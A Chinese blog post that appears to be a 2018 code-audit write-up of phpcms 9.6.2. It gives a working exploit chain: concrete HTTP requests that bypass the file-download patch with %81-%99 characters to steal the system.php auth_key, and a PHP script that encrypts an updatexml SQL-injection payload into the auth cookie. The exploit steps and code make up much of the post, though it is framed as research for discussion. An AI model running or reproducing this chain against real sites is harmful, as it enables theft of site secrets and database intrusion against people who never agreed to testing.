代码审计| phpcms 9.6.2 任意文件下载与前台SQL注入
作者:admin | 时间:2018-2-21 02:13:00 | 分类:黑客技术 隐藏侧边栏展开侧边栏
0×00 背景
最近做代码审计的时候发现phpcms 有更新,现在漏洞详情基本不公开,想要知道漏洞的利用方法只能自己审计了,通常可进行新旧版本的代码比较了,来定位旧版本的漏洞位置,便下载了phpcms 9.6.3与phpcms 9.6.1 和phpcms 9.6.2的源码进行比较和审计,发现phpcms 9.6.2 中存在任意文件下载补丁绕过和前台SQL注入,便撰写了本文做个记录,期待和师傅们的各种交流和讨论。
0×01 任意文件下载补丁绕过
对比phpcms 9.6.2 版本与phpcms 9.6.1版本版本中针对任意文件下载漏洞的修复方法,发现仅是将检测的代码由原本的phpcms_9.6.1_UTF8\phpcms\modules\content\down.php109行修改为\phpcms_v9.6.2_UTF8\phpcms\modules\content\down.php的126行,虽然改为在下载前进行文件的黑名单检测,但是存在被绕过的风险。
如下图所示,可以直接绕过正则,但是要使用什么字符进行绕过并且还能正常访问到相应PHP文件呢?这里可以使用一些空白字符来进行绕过。
代码中虽然使用了trim去除前后的空白字符,但是trim是存在安全隐患的。
%81-%99间的字符是不会被trim去掉的且在windows中还能正常访问到相应的文件,如下图所示。
因此通过使用%81-%99间的字符来绕过补丁进行任意文件下载,需要构造好a_k的值,才能进行下载,利用代码分析就不在做了与之前的phpcms 9.6.1漏洞是一样的,如下是利用方法的操作步骤:
第一步:进行如下请求获得YDVIB_siteid的值。
请求:
[GET]http://127.0.0.1/code/phpcms_v9.6.2_UTF8/index.php?m=wap&c=index&a=init&siteid=1
获得:
[cookie]YDVIB_siteid:75d1XCnlbSh-1zi2xZ-gearAbSsmOcXypuSKXZst
第二步:在[POST DATA] 中的userid_flash参数的值设置为,第一步请求得到的YDVIB_siteid参数的值,并进行如下请求。
请求:
[GET] http://127.0.0.1/code/phpcms_v9.6.2_UTF8/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=./caches/configs/system.ph%253ep%2581%26modelid=1%26d=1&aid=1
[POST DATA] userid_flash=75d1XCnlbSh-1zi2xZ-gearAbSsmOcXypuSKXZst
获得:
[cookie] YDVIB_att_json:ea6fUlmiupVPoK2udMAztI7dpqUURRW1plemEGmRhGPocAvwWbcMk3BARFHzxLI4NJrV1IJQ2PaHeec790iDdhRJ9dJbhEKamgM55SwKR-F3fFmmWDOVuHnyiWg9kyMzQ2l9D_cRPQmM7P9e7ZYrESNQwjMOytrFTIhY4SFmK2Vjc3GS3g
第三步:将GET请求中的a_k参数的值设置为第二步请求获得的YDVIB_att_json参数的值,并进行如下请求。
请求:
获得:
最后点击”点击下载”的按钮进行如下请求,便可以下载/caches/configs/system.php文件,得到里面的’auth_key’
0×02 前台SQL注入
在phpcms\modules\member\classes\foreground.class.php文件中的第31-38行中list($userid, $password) = explode(“\t”, sys_auth($phpcms_auth, ‘DECODE’, $auth_key)); 解密得到的$userid的值,直接传入get_one操作数据库的方法中,造成SQL注入。
要对此漏洞进行利用需要使用\phpcms\libs\functions\global.func.php中的sys_auth方法,\phpcms\libs\classes\param.class.php中的get_cookie方法,phpcms\libs\functions\global.func.php中的 get_auth_key方法对payload进行加解密分析。
跟入get_cookie的方法在\phpcms\libs\classes\param.class.php的第107-116行中可以看到使用了sys_auth方法进行解密操作,且解密的是没有提供key的。
跟入sys_auth方法在\phpcms\libs\functions\global.func.php中找到代码块,当没有指定$key的时候便使用/caches/configs/system.php文件里面的auth_key的值作为秘钥。
跟入get_auth_key方法,在phpcms\libs\functions\global.func.php中找到代码块,当指定的$prefix==’login’时候会将/caches/configs/system.php文件里面的auth_key的值与客户端请求的IP拼接做MD5加密。
分析完毕后得到大致流程:
解密操作:get_cookie(‘auth’) 得到$phpcms_auth,get_auth_key(‘login’)得到$auth_key,然后sys_auth($phpcms_auth, ‘DECODE’, $auth_key)。
再通俗些的话:sys_auth方法对cookie中包含auth的参数名对应的密文值,先使用配置文件中的auth_key进行sys_auth得到的值作为第一次解密后的值,然后使用配置文件中的auth_key的值与客户端请求的IP拼接做MD5加密的值做为新的key,第一次解密后的值与新的key最后传入sys_auth进行解密得到最终的明文。
反之加密方法便是:
使用配置文件中的auth_key的值与客户端请求的IP拼接做MD5加密的值做为新的key,使用新的key与明文进行sys_auth得到的值作为第一次加密的密文,然后使用配置文件中的auth_key作为key与第一次加密的密文传入sys_auth得到的值作为最终的密文,也就是cookie字段名称中包含auth的参数对应的值。
如下是将各个文件中的加密解密方法抓取出来稍作修改,在本地进行payload的加解密操作:
<?php function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0,$auth_key='7G6idVtMAxhgFVu5vGp1') { $ckey_length = 4; $key = md5($key != '' ? $key : $auth_key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(strtr(substr($string, $ckey_length), '-_', '+/')) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.rtrim(strtr(base64_encode($result), '+/', '-_'), '='); } } function get_auth_key($prefix,$suffix="",$ip='127.0.0.1',$auth_key='7G6idVtMAxhgFVu5vGp1') { if($prefix=='login'){ $pc_auth_key = md5($auth_key.$ip); }else if($prefix=='email'){ $pc_auth_key = md5($auth_key); }else{ $pc_auth_key = md5($auth_key.$suffix); } $authkey = md5($prefix.$pc_auth_key); return $authkey; } //解密过程 //step 1 $encryption_str = '6fc7TB1Y1nIRK5HunMc5HAUw5WkBLLuQGBiOISDhJM4d8N8WHHOvqMaUSyWrZdVdH046oGv_e_Ir6Q157UV-yT5Aksuc_h_4RfwZqsEwDHfQckv4SReOiYFxm083X7Tydcw-nUy8l3nP-ouUGl59sN4'; $operation1 = 'DECODE'; $decryption_step1 = (sys_auth($encryption_str, $operation1)); echo 'decryption_step1 result:'.$decryption_step1."\n"; //step 2 $decryption_step2 = $decryption_step1; $auth_key = get_auth_key('login'); echo 'decryption_step2 result:'.sys_auth($decryption_step2, 'DECODE', $auth_key)."\n"; echo '-----------------------'."\n" ; //加密过程 //step 1 $clear_str = "1'or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '1 f867fef04bd76d95abe01300951ca336"; $operation2 = 'ENCODE'; $encryption_step1 = sys_auth($clear_str, 'ENCODE', $auth_key); echo 'encryption_step1 result:'.$encryption_step1."\n"; //step 2 $encryption_step2 = (sys_auth($encryption_step1, $operation2)); echo 'encryption_step2 result:'.$encryption_step2;
使用上面的代码可以进行解密和加密,下图中decryption_step2 result的值便是对payload进行解密的最终结果,encryption_step2的值是对payload进行加密的最终结果。
最终利用的现象,cookie中的YDVIB_auth参数名称,前缀是安装时候生成的可能不一样,可以在配置文件中找到对应的值,可以先注册普通用户然后看服务端下发的cookie中字段名称中xxx_auth的参数名称,便是存在漏洞的位置。
0×03 总结
phpcms 9.6.2 版本的任意文件下载补丁可绕过,导致可下载配置文件,获得key,然后利用得到的key可以进行SQL注入,当然key还可以进行很多其他操作,本篇没有涉及,如果师傅们有好的示例或文章,期待一起交流。